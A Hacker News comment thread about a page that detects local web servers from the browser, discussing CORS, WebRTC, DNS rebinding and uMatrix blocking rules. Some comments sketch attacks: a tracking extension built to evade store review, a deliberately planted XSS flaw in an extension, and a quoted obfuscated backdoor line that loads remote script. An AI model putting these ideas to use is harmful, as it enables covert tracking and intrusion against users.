Hacker News new | past | comments | ask | show | jobs | submit login
I can see your local web servers (jameshfisher.com)
652 points by jamesfisher 22 days ago | hide | past | web | favorite | 190 comments



Other approach is to create a useful extension like:

  https://addons.mozilla.org/en-US/firefox/addon/yt-adblock/reviews/
disguise that you're inserting an iframe linking to your web server into every single page user opens, by naming variables and your tracking domain incorrectly and by waiting for an hour after installation (this may also help avoid automatic tests mozilla is doing) and then just sit back and wait and log all the referers and ip addresses. It's a bit stealthier too, but needs users to visit their local web servers. But you'll also get the full URL.

Nobody will report you or care about the report and users are banned from fixing the extension code locally even if they're able to review it themselves. Bad reviews with some actual text fade away quickly, so if someone warns your other users, it will be pushed out to page 2 after a while by other useful one word or just empty reviews and it will work out.


Very nice catch. I examined a little bit more. Seems like line 16 on scripts/yts.js is the backdoor.

  enableButton.src = '//remove' + '.' + 'video/webm';
So owner of this addon have remove.video domain. On https://remove.video/webm there's a packed javascript code. When I unpacked it I got this: https://paste.ubuntu.com/p/C24bZc9Cn7/

There's a base64 encoded domain list in packed javascript code. Here's the list of domains: https://paste.ubuntu.com/p/RMKd8Ms5QQ/


From my experience as a dev (who has already submitted extensions to moz), this will be sorted out. However, it might take up to 4 - 6 weeks, until an actual human being reviews the changes. But it gets reviewed.


Last updated "5 months ago (Dec 16, 2018)".

One would hope that reporting an extension would help reviewing it sooner especially if it's 26th top rated one and all that's needed is to verify the claims in the report.


Is there any way to get the source code of extensions from the Mozilla web site? I think some years ago you could look at the code in your browser from a link in the version history but I don't see any links at all now.


Right click "Add to Firefox" button and use "save as..". This will get you an xpi file which you can unzip and inspect.

Many addons will use some packing method, bundle all kinds of stuff into their content scripts (jQuery, etc.). It can be hard to review.

Some addons are quite horryfying (you see stuff like `<span ...>${someText}</span>`) (missing escaping, etc.). I'm quite sure there are some content scripts out there, that have XSS issues, that can be triggered from the page itself. This is great on pages like github, where there's quanta of user controlled content.

So if you want a suggestion for a clever attack:

1] make an extension for facebook or twitter or github that reorganizes the wall somewhat and make a `mistake` like assigning some user controlled content via innerHTML. This will probably pass review.

2] Suggest your addon to your target.

3] Post your payload as a message/tweet/whatever to your target. Now you have extension assisted XSS.

Pretty easy to add XSS to any page, with plausible deinability.



Hopefully that sort of shenanigans would fail AMO code reviews


This is not a hypothetical but a smoking gun. That plugin really does those things.


what is meant by, "users are banned from fixing the extension code locally"? i download and modify other people's extensions all the time.


Probably the signing requirement for release builds of Firefox.


Nice this will be fun


If you use uMatrix, you can easily block the localhost and local network "sniffing" with the following rule[0]:

  * 127       * block    ### block access to IPv4 localhost 127.x.x.x
  * localhost * block
  * [::1]     * block    ### block access to IPv6 localhost
  * 192.168   * block    ### block access to LAN 192.168.x.x
In principle, you can use this without any other blocking, i.e. with the rule:

  * * * allow
and hence without disabling javascript on any sites.

[0] https://github.com/ghacksuserjs/ghacks-user.js/wiki/4.2.3-uM...

Edit: as pointed out by DarkWiiPlayer below, if you want to be able to access the localhost websites from the same browser, you need:

  localhost localhost * allow
and similarly for the LAN. In full:

  127       127       * allow
  localhost localhost * allow
  [::1]     [::1]     * allow
  192.168   192.168   * allow


Also, uBlock has an option in its settings to block the webrtc leak (but not enabled by default):

"Prevent WebRTC from leaking local IP addresses"


Add all the RFC1918 unroutable private networks.

https://en.wikipedia.org/wiki/Private_network

    10.0.0.0 – 10.255.255.255 (10.0.0.0/8)
    172.16.0.0 – 172.31.255.255 (172.16.0.0/12)
    192.168.0.0 - 192.168.255.255 (192.168.0.0/16)
    127.0.0.0 - 127.255.255.255 (127.0.0.0/8)
https://tools.ietf.org/html/rfc1918

Possibly also 100.64.0.0/10 for carriers.

https://tools.ietf.org/html/rfc6598#page-8


Possibly also the IPv6 ULAs:

https://en.wikipedia.org/wiki/Unique_local_address

Not sure if those can be expressed in uMatrix as a prefix rule.


Presumably also:

    * 10      * block    ### block access to LAN 10.x.x.x


uMatrix blocked all of it for me by default.


Yes, but by default uMatrix might be overly strict for many people. For instance, by default it blocks all third-party javascript.


that's awesome, using it!

but to be fair, the point seemed to be more that if you run something that's "only" exposed locally... don't. securing each and every machine with uMatrix doesn't seem the answer to this.


you'd need at least

    localhost localhost * allow
to be able to open sites on localhost directly.


Anyone know if this can be done on a hosts level instead of a browser level?


It can’t. At best you can try to modify the hosts file to point localhost to somewhere bogus, but aside from the potential breakage that could cause, it won’t help against any site that simply accesses http://127.0.0.1 instead of http://localhost. In general, the hosts file can be useful for quick-and-dirty blocking, but it’s not really capable of enforcing a security barrier.

Edit: But there may be other ways to do it at an OS level, depending on your OS.


"If you see any results like 192.168.0.4:3000 is available!, you should tell your colleague to secure whatever she has running on that port"

Someone's going to access this page at $BIGCORP with an overly trigger-happy IDS and get a fun morning meeting with IT to un-quarantine their machine.


Yup, excited for the meeting. Haven't seen those guys in a while.

Was expecting to learn some security techniques, instead got essentially port scanned :)


Whereas I'm learning that my network is fairly secure against this type of port scanning.


Of course, mine was too. I'm sure in part due to the diligent security team that will be stopping by my desk in the next few days!


Since I work from home I'm both the security team and the guy who inadvertently ran a port scanner in his web browser.


edit: I am a dolt. Thank you :)

I got this address as well, do you have anything running on .4?

It's just weird because I have .1 router, .2 AP, .3 pi-hole

then .10 is when I start my static IPs

and .100 is where my dhcp starts

nmap says that host is down as well


That just the example in the description, not the scan results.


I think that's just the hardcoded example in the text, considering it's still there when I viewed with no scripts enabled (and I'm on a network that doesn't have anything assigned in 192.168.0.0/16).


The page is using JavaScript with the JS WebRTC interface RTCPeerConnection[0]. Maybe that can help.

[0] https://developer.mozilla.org/en-US/docs/Web/API/RTCPeerConn...


Judging by "ReferenceError: webkitRTCPeerConnection is not defined" message in my browser it probably uses WebRTC to get your local IP subnet. I installed an add-on to block WebRTC after I watched a presentation on this tool [1][2] and I recommend you also do this, unless you actively use WebRTC (and don't want the hassle of toggling a switch).

Unfortunately the protocol is vulnerable by design. :(

[1] https://portswigger.net/daily-swig/new-tool-enables-dns-rebi...

[2] https://www.blackhat.com/asia-19/arsenal/schedule/#redtunnel...


The only thing blocking WebRTC gets you is that it hides which subnet you are on, right? As in, an attacker can still just enumerate all of the common ones (10.0.0.0/24, 192.168.0.1/24, and like 5 others) and get the same results as with WebRTC enabled. So blocking it really just slightly increases the obscurity, but not really the security.


Sure, but it helps and it is cheap. I also don't use a common subnet and enjoy uMatrix. Obscurity is a viable strategy as part of a layered defence. ;)


True.

My main problem is that blocking WebRTC blocks some very interesting methods to "re-decentralize" the web, which are only viable if most people don't have it disabled.


This is a classic conflict that I’ve observed a lot. Similarly, widespread SSL pinning and app sandboxing makes it difficult to reverse engineer opaque outgoing traffic. It might be more secure, but you also cannot easily inspect what data a sandboxed, cert-pinning service is sending to the outside world.

I think it’s probably something like “security, privacy, anonymity... pick two.”


Nope, you can't

    Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at http://localhost/. (Reason: CORS header ‘Access-Control-Allow-Origin’ missing)

Anyway

    TypeError: /(192\.168\.[0-9]+\.)[0-9]+/.exec(...) is null i-can-see-your-local-web-servers:169:41


The Cross-Origin check be circumvented via DNS Rebinding: When you request mypage.com, my DNS returns the ip of my webserver. On all subsequent requests, it will return 127.0.0.1. Now localhost is on the same origin as my page.


It doesn't matter, you should be in control of a DNS the user relies on and you should have your server send

    Access-Control-Allow-Origin: mypage.com
or

    Access-Control-Allow-Origin: * 

which is not a default anywhere AFAIK and is domain based, not IP based

And your server should be enabled to respond to mypage.com host header


Based on m12k's suggested interpretation of your comment:

> you should be in control of a DNS the user relies on

You always are when a users visits your domain – you control the DNS of your domain.

> Access-Control-Allow-Origin: *

You don't need access-control headers, because you stay on the same domain.

> Your server should be enabled to respond to mypage.com host header

Most servers listening on localhost ignore the host header.


> You always are when a users visits your domain – you control the DNS of your domain.

I meant you need to control the poisoned DNS

If I use 8.8.8.8 as DNS you can only work on the domains you already control, which is kinda useless

> You don't need access-control headers, because you stay on the same domain.

No, you don't

My localhost server only respond to localhost and 127.0.0.1 host header

Not to mypage.com

Nginx does taht too by default

https://github.com/nginx/nginx/blob/master/conf/nginx.conf#L...

But even if you did, you still haven't resolved the issue: you can't make a call to a different domain without access-control headers, unless it's the same domain

you can't load mypage.com and then fetch from www.mypage.com, even if you resolve www.mypage.com to 127.0.0.1 the browser won't let you do it


> But even if you did, you still haven't resolved the issue: you can't make a call to a different domain without access-control headers, unless it's the same domain

> you can't load mypage.com and then fetch from www.mypage.com, even if you resolve www.mypage.com to 127.0.0.1 the browser won't let you do it

In this part you’re confusing what a rebinding attack is: by serving a DNS response with a short TTL an attacker is able to associate two different IPs to the same query, thus it'd be mypage.com and mypage.com (not www.mypage.com).. bypassing the same origin restrictions of the browsers.

https://capec.mitre.org/data/definitions/275.html


> In this part you’re confusing what a rebinding attack is: by serving a DNS response with a short TTL an attacker is able to associate two different IPs

But it doesn't really work.

I query my DNS, on my home router, not your DNS.

And the DNS on my home router query the ISP's DNS, which caches requests.

I bet you can't go below few minutes resolution.

I had this problem when validating the Letsencrypt DNS challenge, I had to let certbot run for almost 20 minutes before my home router picked up the new value.

When I'm at work, I use the company's DNS, which ignores non standard TTLs and caches the first answer forever (well... almost) and disallow external domains that resolve to reserved IP addresses.


Depends on the resolver configuration. E.g.: unbound has cache-min-ttl, a way to increase cache efficiency (and a mitigation for attacks such as rebinding).

> Time to live minimum for RRsets and messages in the cache. Default is 0. If the the minimum kicks in, the data is cached for longer than the domain owner intended, and thus less queries are made to look up the data. Zero makes sure the data in the cache is as the domain owner intended, higher values, especially more than an hour or so, can lead to trouble as the data in the cache does not match up with the actual data any more.

Which is one of the reasons I think this is manly effective against home networks.


Wait, doesn't the certbot DNS challenge query the nameservers of the domain being checked, not your local DNS resolver, otherwise my fast DNS challenges should fail?


Not by default [1], but you can set it to what you prefer.

But in my case my network is configured to always reach the in house DNS first, to keep latency low

[1] https://github.com/letsencrypt/boulder/blob/8167abd5e3c7a142...


The short TTL is very sketchy and most NIDS(s) have contextual rules to detect DNS rebinding attacks. One may additionally filter private ranges from responses and HTTP requests by host headers. Not to mention TLS.

It's useful against vulnerable IoT devices or home routers, but is it still effective to breach enterprise perimeters?


I don't quite understand your comment. Do you mean "shouldn't" whenever you wrote "should"?


I think they write 'should' when they mean 'need to if you want the aforementioned to be a practical attack vector'


yeah, I meant need, sorry


This is the reason why my local DNS resolver won't allow returning private IP space (including localhost).


The post specifically mentions CORS and shows an example Express app that has CORS enabled.


CORS is not enabled by default anywhere, I have few servers running right now on my laptop and the page can't see any of them, because all of them have CORS disabled

First thing you do when you enable CORS is to configure it to only respond to specific domains, so when you deploy to production you don't leave it open by accident.

BTW if you enable CORS as in 'simple usage' in the docs, chances are the home page is a blank page and there will be nothing to be stolen


Recently I was testing a client-side algorithm that pulled a lot of data from the server and I thought my http server might have been the bottleneck, and so I spun up a few copies of the server but had to enable cors to get the client talking to them all. Newbs like me don't realise that localhost+cors = exposed to the www, so this article was very surprising and useful. This app is only used internally and so your deployment justification doesn't make sense for this case, but I will definitely make sure only specific domains are exempted in the future, thanks to this article.


I started a local webserver listening on localhost:80 just to see what happens, but this thing seems to not detect it. It shows me "Scanning localhost ... localhost complete."

Edit: My guess is that this thing can only detect servers that send a CORS header that permits cross domain access.

It could probably do way better detection if it did not do xhr requests but added script/css/whatever elements to its own page pointing to localhost and detects if those error out.


CORS is a security mechanism for browsers to prevent leaking user information (e.g. cookies) when doing cross domain requests from a browser. CORS does not prevent accessing the server at all. You can always curl a CORS protected server but you won't be able to make a requests including the user's cookies from a disallowed domain.


Hmmm...

I can see the request in server logs, but it seems CORS is preventing the response.

I may be missing something.


They way this is set up it's enumerating systems and ports on internal networks, not actually accessing those systems and ports. The CORS header (or lack thereof) in the HTTP response of the requested item is what dictates whether it can be accessed, so what happens is the request first sends a HEAD request to get the headers for the endpoint, and then if CORS is set up and allowed for cross-domain access is allows the connection (or if it's a request to the same domain and CORS for the current page isn't too restrictive, it allows the initial request without a HEAD request).

What you see in the browser developer tools if you open them up is that a bunch of requests are being made, but are being denied because they are failing CORS checks.

Where data is being leaked (in context of security) is that there's a difference in how the responses are handled. Either it's allowed (because the remote side CORS is too loose) in which case the page will show s message that the specific host/port combi is available, or it will get no response and time out, in which case they skip checking that host any more and assume there's nothing at that IP (which is when they print the "unreachable" message), or it continues on with the next port. If at the end there's been no success and no timeout, it prints the "complete" message, and that means there's probably something at that IP.

An important thing to note is that CORS is not like a firewall, and it doesn't actually stop all traffic from happening, so that can sometimes be used to get additional information that's not necessarily meant to be exposed. That said, what the page is showing is that the specific way CORS functions (that is, asking the remote side if they accesible), and the fact that Javascript runs locally on your browser, means that there's some interesting ways those interact which can cause security concerns.

A as idea of how this could be used to more nefarious ends, if it found listening and accessible servers on localhost or the local network, it could then try to identify them based on the headers/content returned, and try to do something with that.

Given that you could possibly even compile some network vulnerability scanner/exploiter to WASM and use it for only the subset of vulnerabilities it could accomplish through plain HTTP requests (a lot of work, it's probably easier to just write your own shim and crib their exploit library), this could be very easily weaponized.


That all makes sense, but the OP said that the scan didn’t identify their HTTP server. I wonder why.


Well, "Scanning localhost ... localhost complete." which they report means it found the sever, but did not allow access (CORS restricted). This is normal, as the default behavior unless modified by a CORS header is that cross-origin resource sharing is disallowed, and that includes same host but separate port. I believe edit is correct, in that this demonstration is for finding poorly configured local services that have a CORS header that is too open (perhaps because there are multiple services meant to interact with each other).


Well yeah, but CROS prevents his demo from working. And you cannot curl something remotely when it only binds to 127.0.0.1.


I started python -m SimpleHTTPServer 5000 and site reports nothing, but I get: 127.0.0.1 - - [28/May/2019 22:14:51] "GET / HTTP/1.1" 200 - each time I refresh page. So it sends request that is received by server but somehow does not register on site.


Because your browser is preventing the javascript from accessing the response.


I wonder if one can read the response via the time side-channel attack.


> Scanning localhost ... localhost complete.

Yet I am running Node.js http-server[1], and see the request in the logs:

    [Tue May 28 2019 23:56:54 GMT-0500 (Central Daylight Time)] "GET /" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
[1] https://github.com/indexzero/http-server


I started some as well, it didn't find anything.


It's not that it doesn't detect it, but it's not open to external networks, which I guess is a good thing.


What do you mean?


Probably that your browser is blocking access to the local domain, from the context of an external domain. I'm just guessing here, of course.


I'm interested in this because I don't fully understand the consequences here. I'd like to gain a deeper understanding through some concrete examples.

With the PHP CLI, I can run:

    php -S localhost:8000
With Python3, I can run:

    python -m http.server 8000 --bind localhost
The demo fails for me in both cases, even though a request to localhost:8000 is sent. (EDIT: The server log in the terminal window does show that the request arrived at the local server).

My question is: What is the risk of running one of these servers and then visiting some random web page?


> My question is: What is the risk of running one of these servers and then visiting some random web page?

It depends on what you're exposing on those ports. If it's something sensitive, stop. Any web page can run javascript and as such, any web page has access to every port and service that your machine has access to ... because at that point, the web page is a program running on your machine with full network access.

However, this entire "vulnerability" makes no sense to me. Even if I'm running something on my machine or local network, I am not going to rely on the firewall as a security mechanism. That is profoundly stupid and is well known to be profoundly stupid. So all those servers, including the ones I am creating and running, will have their own security mechanisms. So you can ping my server? So what?


If it's got CORS enabled you can do a hell of a lot more than ping your server.


Wait, what? I think you means the opposite. If it's got CORS enabled, then you can't do anything unless the request is originating from the relevant domain.

Anyway, do not rely on firewalls (and CORS is a firewall) as the sole security measure. Do not create unauthenticated endpoints unless you want everybody to use them.


To elaborate, I meant a permissive CORS policy, which is what I see most often.


Worst case they proxy all of the requests and can essentially access anything open on the port. For me it's all development stuff, so if they want access to a broken-half-the-time application with mock data then whatever.

However they'd have to know the routes to request to (or proxy all requests and do it in realtime) which isn't very likely if it's just some development application specific to you.

Basically there really isn't much risk if you aren't exposing anything interesting. Maybe if you're working on something proprietary it could be leaked?

Either way you may as well reconfigure your applications if the webpage can detect them, the risk is low but still existent.


I only ever run my local dev server on port 80, and use a hosts file to assign custom (fake) domain names to each of the sites I want to run.

I mentioned as much here a few years ago when I first came across this idea of assigning (and remembering) random unique port numbers to every one of your apps in development, and was surprised to hear that it's such a common practice. It seems sub-optimal for a lot of reasons, beyond the obvious one noted in the article.

The big one for me is that none of my apps need to know anything about how to handle port numbers URLs. They know their own domain name via a config setting that can be flipped on the live server. It's the same pattern (with no colons or numbers to worry about) so there are no edge cases to test.


Unless I'm missing something, this only works if you are running one site at a time, or you have a single web server bound to port 80 that supports virtual hosts. You also need application and/or configuration support to get this working properly. And even then, if you run any software with an embedded web server you are usually out of luck unless you want to fiddle with a reverse proxy configuration.

For these reasons I, at least, simply run applications on different ports. The problem isn't the port, it's the web browser allowing cross domain requests to local networks by default (another reply here suggested it is WebRTC specifically that is flawed).


For a professional web developer, setting up an Nginx reverse proxy for a few apps should be reasonably efficient. Chances are that most are all of them are written in the same language and configuration can be copy/pasted between them. Or a subdomain pattern can be mapped into a directory pattern, so there is really only one configuration-- Just add a new directory and a matching subdomain starts working, assuming the right wildcard DNS entry is pointed to your localhost.


IIS handles all this out of the box for me. I just bind the host name to the site in question. It sounds like maybe this isn’t something that other web servers do, which is surprising. The whole point of the operation is to seamlessly run 30 odd websites on one dev machine without needing to fiddle with port numbers or anything else.


In the *nix world and with the move to containerization, most applications now assume they are the only thing running on the web server, and therefore demand custom config/settings. Node apps for example are their own server.


This is more or less what I do, except instead of 80, I use a port above 1024 because those don't require root privileges to bind to: https://www.w3.org/Daemon/User/Installation/PrivilegedPorts....

I'm sure the Container Culture Kids have their own overly-complicated thing, though.


The page doesn't do a great job at explaining the mechanism (which from a quick glance seems to involve WebRTC).

This is a better resource on this topic, which involves DNS rebinding: https://medium.com/@brannondorsey/attacking-private-networks...

DNS-rebinding also gets around the cross origin request issue, which some comments here mention.


I used to scan the company network for Selenium servers and remotely open "inappropriate" pages. Always nice to see a coworker wonder why a browser window with images of Pooh opened up.


I hope you're not in China!


Makes you wonder what other apps are accepting local HTTP connections (e.g. vendor bloatware [1]).

[1] https://support.lenovo.com/th/th/product_security/len_4326


When will software engineers finally understand that issues like these aren't problems with some random service you run on your computer, but with the (lack of) security model behind modern web browsing?


Modern web browsing provides for this with same-origin policy. Same-origin policy can be negated by the server if it sets an overly lax CORS directive.

So this is something that's secure by default, but can be broken if the "random service you run on your computer" decides to break it. I don't think that's an issue with the browser's security model.


Same-origin policy is not a security model. It's a ridiculous quarter century old hack. If you pause to think about it, domain names are a horrible way to delineate security boundaries on the web.


I disagree about domain names, but I don't think that's even relevant to this discussion.

Do you have some kind of security model in mind that would work better than same-origin policy in this case? I.e. cross-origin requests are still allowed to happen somehow, but users are still protected against random services intentionally disabling your security measures?


It is bloody obvious that when people spin something up on their local machines the do not intend to make those pages available to every website they visit. This by itself suggests that there should be a dedicated security context for such applications and that the restriction on information exchange should be based on that context. Not on some random thing the application does (like authentication, CSRF or sending CORS headers).

Scenarios like that should be the foundation of a sensible security model, not an afterthought achieved by applying layers and layers of security ducktape in every single instance.


>an afterthought achieved by applying layers and layers of security ducktape

This is where you're missing the fundamental nature of the issue in this article. The sensible security model is there by default. An additional layer is added to make a resource available cross-origin, and the article merely serves to remind people that making a resource available cross-origin is still making it available cross-origin when the origin is localhost.


>Not on some random thing the application does (like authentication, CSRF or sending CORS headers).

Sending CORS headers isn't "some random thing" though, it's specifically the one thing that stops the security model that's in place from working.

There's a lot of bad security practices that you could define as "some random thing", and the fact that some people might do that thing doesn't make the whole model around it invalid.


I can see the list of XHR requests made, and I have half a dozen local web servers running, and there are a bunch of other web servers running on my network. I have a bad habit of spinning up a server on an ESP32 whenever I want to remote control something physical.

... Strangely, despite the XHR's hitting ports and IPs I know are running unsecured web servers, the site sees nothing. Lots of "unreachable".

Firefox 67.0, Arch Linux (5.0.10).


The requests should fail unless the servers you are running allow CORS as per the headers.


There's half a dozen that are.


Do you have any locked down policy on them though? I assume this would only work if you gave blanket access.

I noticed in my tests it found one on port 3000 with blanket access, but didn't see one on port 9999 with restricted access( policy => allow from *.mydomains )


Yes. I'm terrible and have them set to allow all domains, and all methods.


Maybe your browsers are up-to-date?


Anyone using uBlock origin can add these custom rules to protect localhost:

  * localhost * block
  localhost localhost * allow
This should block any non-localhost from accessing localhost.

(note: only protects you superficially, based on DNS. what we'd want is protection based on IP. otherwise you're still exposed to anyone setting their own DNS to 127.0.0.1. but it's something...)


Here's a question I've had for a while: WHY in the world do web browsers not block access to localhost? What exactly is the extremely compelling use case that has prevented them from blocking this?


There are a fair number of applications that expose a UI with a local web server. I use the Ubiquiti Controller, but it's also quite common in the world of Plex, etc. It's also a path used for local OIDC, such as with the gcloud CLI.


> expose a UI with a local web server

I'm not talking about UIs hosted on local web servers being able to send requests to themselves, I'm talking about UIs hosted on REMOTE web servers being able to send requests to local ones. It seems far worse than a random cross-origin request to me and for the life of me I can't imagine uses cases.


That's not really how the internet works.

What is a local webserver? Running on your machine? Running on your LAN? Running on your corporate intranet? How should a browser differentiate between these things?

What qualifies as a remote server? Did you know, some very large enterprise environments squat on public IP's for private intranet internally due to address space exhaustion (IPv4 anyway)? Just because something appears to be on a public address doesn't mean it actually is.


It seems like an obvious measure would be for sites served outside the private-use or loopback ranges to be unable to request content from servers in private-use or loopback ranges.

> Did you know, some very large enterprise environments squat on public IP's for private intranet internally due to address space exhaustion (IPv4 anyway)?

Sucks to be them. If they've exhausted their private use IPv4 addresses, they can either rest comfortably knowing that NAT and IPv6 can solve their problem or they can ignore IETF recommendations and build a card house network that breaks if you give it a stern look.


My preferred solution would be to disable javascript altogether.

> Sucks to be them. If they've exhausted their private use IPv4 addresses, they can either rest comfortably knowing that NAT and IPv6 can solve their problem or they can ignore IETF recommendations and build a card house network that breaks if you give it a stern look.

This will only lead to organizations running IE7 (or whatever outdated IE version is most common now) forever.


> My preferred solution would be to disable javascript altogether.

My preferred solution would be not to use web browsers at all, but our preferred solutions are much harder to make a case for than a simple security policy.

> This will only lead to organizations running IE7 (or whatever outdated IE version is most common now) forever.

In general, let's let them make that choice, but this could be configurable in the browser in the same way Javascript and cookie policy exceptions are handled.


This makes no sense. I'm just talking about localhost, I don't care where the physical computer is. It makes no difference if you're an enterprise with software running on a private or public or whatever IP. Whatever the case, I still don't see why you should be able to use JS to access a localhost address.


But what if your webserver is bound to 0.0.0.0:80? Which IP ranges do you block? Just the lo interface? Well, that wouldn't prevent this exploit as the webserver would be listening on all of your IP addresses.


What? Nobody cares what the listener is listening to. Nobody even cares if a listener even exists. It's completely irrelevant. You just block the outgoing request if it's sent to a localhost address from a non-localhost address. What's so complicated about this?


If you're suggesting that anything not originating on an enumerated list of IP's for localhost cannot request an url for something that resolves to an entry in an enumerated list of IP's for localhost, that would be possible, but is not really representative of the entire surface area of the effect demonstrated in the article.

It's also entirely possible you have some development api running on a particular port on localhost, and some app running in a container or VM that wants to make calls to it.


> is not really representative of the entire surface area of the effect demonstrated in the article

So let's let perfect be the enemy of good? What's the logic here? Let's leave a huge security hole because we can't achieve perfection in all scenarios?

> It's also entirely possible you have some development api running on a particular port on localhost, and some app running in a container or VM that wants to make calls to it.

The VM should be on localhost or you should jump through a few hoops to whitelist it somehow. I see no reason why this should be allowed by default.


> So let's let perfect be the enemy of good? What's the logic here? Let's leave a huge security hole because we can't achieve perfection in all scenarios?

The logic here is don't hastily start implementing changes to how http requests currently work without a well established plan for doing so. I think there would be a good deal of corner cases you need to account for to successfully implement this feature.

Anyway, this problem seems pretty obvious, and I'm sure this discussion has been had elsewhere already.


> The logic here is don't hastily start implementing changes to how http requests currently work without a well established plan for doing so.

As if the point of this thread was to push browser vendors to hastily implement this without thinking it through? Are you just trying to find something to have an argument over? I'm tired of this.


IIRC dell uses this to load support information into site. It's a reason, not saying it's a good one.


While I think it would be a shame to completely disable the ability for remote sites to access localhost (I'm sure it can be useful somehow), it would make far more sense to be opt-in for those cases.

Maybe browsers should assume a CORS deny all unless otherwise specified?


quick development? some of us use localhost to quickly test/develop.


They do...

[Error] Failed to load resource: Origin http://http.jameshfisher.com is not allowed by Access-Control-Allow-Origin. (localhost, line 0)


Or it could be like what happens if you access a site with a broken SSL cert - you get a big red warning page and your only allowed to continue after clicking some tiny technical option.


Caching reverse proxies for local virtual machine use, in my case. Primarily used for Linux repos, but also configured for personal use, eg for webcomics.


That's about as far from compelling a reason as you can imagine for the browser to allow this by default?


Some browsers apparently do, which is why this demo isn't working for some HN users.


Can anyone explain what kinds of attacks are possible here? A malicious script on this website can identify that a service is running on a particular endpoint (IP + port), and depending on the server's CORS policy, the script may be able to submit HTTP requests to that service... am I getting it right? I can see how that might be dangerous if the service responds to simple GET requests with sensitive information, or has a well-documented REST API and no authentication. Is this the scope of the vulnerability, or is there more to it?

I tried this with a few different services running on my machine (a one-liner WEBrick server in Ruby, Syncthing, a plain-text accounting program calling beancount, etc. etc.) and the script didn't detect any. I take it that means that these services all don't allow CORS?



I wrote some code a while back to find and detect other devices on your network, although it no longer seems to work on safari: http://joevennix.com/lan-js/examples/dashboard.html

The fingerprinting db it used can be found in the repo: https://github.com/joevennix/lan-js/blob/master/src/db.js


Can anyone share what measures we can take as web developers to secure local development environment?


Custom DNS server with DNS rebind protection. E.g. if you’re running OpenWRT you’re fine[1].

Also just don’t test on localhost. You can use a proper domain (or claim one in .test TLD[1] if you’re fine with selfsigned certs) and point it to localhost.

If you’re going to use any redirect flow like OAuth/OpenID you’re going to need this for testing eventually anyway.

[1] https://openwrt.org/docs/guide-user/base-system/dhcp

[2] https://en.wikipedia.org/wiki/.test


What do you recommend if you're running a local server? Eg, I've developed programs before with the assumption that the user will be running it either for their local machine, or perhaps for their local network.

Think self hosted Wiki/etc. I was never sure (and thusly have yet to properly implement it) what would be secure, but also a good UX. A normal auth + self signed https would be simplest I imagine, but I'm not clear if browsers widely accept that. I recall Sandstorm having issues with this area, and required a domain to fully run properly. Which seems.. complex for a minimal install requirement.

Thoughts?


I actually wanted to do something similar one time and I figured there’s one way to do it:

1) Get a domain name for the project, e.g. mycoolwiki.tld

2) In the installer/setup provision for the user a random subdomain, e.g. d2c8116f19d0.mycoolwiki.tld

3) Use Let’s Encrypt DNS method to provision cert

4) Redirect d2c8116f19d0.mycoolwiki.tld to LAN IP

It’s not ideal because you need some external infrastructure and it assumes no DNS rebind protection.

However, if your webapp has a client and server, that is communicates via API only, you can actually do a lot better:

4) Setup local server to accept CORS requests from d2c8116f19d0.mycoolwiki.net only

5) Host client at d2c8116f19d0.mycoolwiki.tld

Additionally,

6) Make the client a PWA with offline support

and/or

6) Offer browser extension to use local copy of the client when user visits ∗.mycoolwiki.tld

Though for my use case I actually wanted to have ∗.mycoolwiki.tld/ipfs/<hash> be backed by IPFS and offer generic extension that both verifies that the IPFS gateway is playing nice and (if configured) redirect to local gateway.

Also offering Electron client instead of browser would work as well and saves you getting the cert.


> Custom DNS server with DNS rebind protection. E.g. if you’re running OpenWRT you’re fine[1].

One (very) easy way to achieve this is to use dnsmasq as a local caching server and pass it the option --stop-dns-rebind


Running in dedicated network (mount and IPC are next in priority) namespace for folks on Linux.


don't set up CORS in dev


I was surprised to notice that this page correctly found my local network IP address, and was thus able to query correct network range. I have disabled WebRTC [0] now in Firefox (media.peerconnection.enabled is now false), but the page still tries the same range. Is there any other way they can get my local network IP?

[0] https://stackoverflow.com/a/26850789


Here's the tl;dr

  app.use(cors());
defaults to Access-Control-Allow-Origin: *

If you know how CORS works, you already know that even if the resource is on localhost, it's open to any web page, including not on localhost. You won't find anything enlightening here.

If you don't know how CORS works but you're using the Express middleware for it anyway, read the documentation: https://expressjs.com/en/resources/middleware/cors.html#conf...


Some time ago, I made something using a similar technique to redirect to router configuration pages. Used WebRTC to get local IPv4, then spawned a worker and timed it, if it came back fast, I assumed it was there, and redirected the user, otherwise I tried a different common "router" address. I was unaware of dns rebinding at the time.



Also if you are a front end developer and are on an insecure WiFi (coworking space or public WiFi) make sure you only bind to localhost.

Otherwise other people on the network can see your frontend code which you are probably compiling with sourcemaps, which will give the attacker almost the complete source code of your SPA.)


But frontend applications expose mangled javascript which can be reverse engineered anyway


It can be done, but it is usually uglified. No need to give the plain source to outsiders.


His demo did not work so his message does not really get across. Maybe there ware ways to exploit it but if so he failed. I got a CORS rejection.


The demo may not have worked for you, but it does work and works for many other people. Just because your particular browser is secured does not mean the author failed.


This just reminds me why I use Vagrant and only run a local webserver while I'm actually doing development work on it.


Funny enough, the site is reporting port 3000 to be running a web server. It is not - according do nmap and my knowledge.

Any ideas on this?


If like me you saw the bright red text "If you see any results like localhost:3000 is available!" as meaning :3000 was actually available, it's just an example. The yellow box above seems to be where the results would actually be.


I must admit, it was exactly this. I read the text without using my brain properly.

Please accept my sincere apologies.


I did exactly the same thing and spent too long running various things to find out what on Earth was using the port! Only reason I had a good guess at what it may have been.


If you're on Linux, BSD and macOS, you can run:

    sudo lsof -i | grep 3000
To try and see if a process has claimed the port.

On Windows:

    netstat -ab
I've forgotten so much Windows I don't know how to filter the result, but it'll give you a list of ports and processes.


Some BSD systems won't have lsof out of the box, in which case fstat/netstat will give you the results you want.


O only get: "Scanning localhost ... unreachable.", and there are at least 3 web servers active on the network.


Do you have WebRTC disabled? I disable it in Firefox and it breaks this test.


No, default Chrome settings.


Firejail allows for the creation of sandboxed interfaces, which include the ability to block local network access.


In the source code, he is attempting to serve images from http://localhost:4000/

It looks like a mistake because the image URLs are unlikely to exist on YOUR localhost at port 4000 when you load the page.


So does this mean that if I'm running a local dev machine with un-bundled source code on my company computer:

Any person that joins the wifi network and goes to a website that sniff's this out will have access to my computers local server?


Depends what server software you're running and how it's configured. The specific configuration element you want to look for is usually called the "bind address". If it's set to something other than "127.0.0.1" then it will probably accept external connections.

If you know the port number your server is running on, you can also open up command prompt / terminal and check with "netstat -an". Look at the local address column and make sure your web server is listening on 127.0.0.1.


Appreciate the insight. Looks like I see:

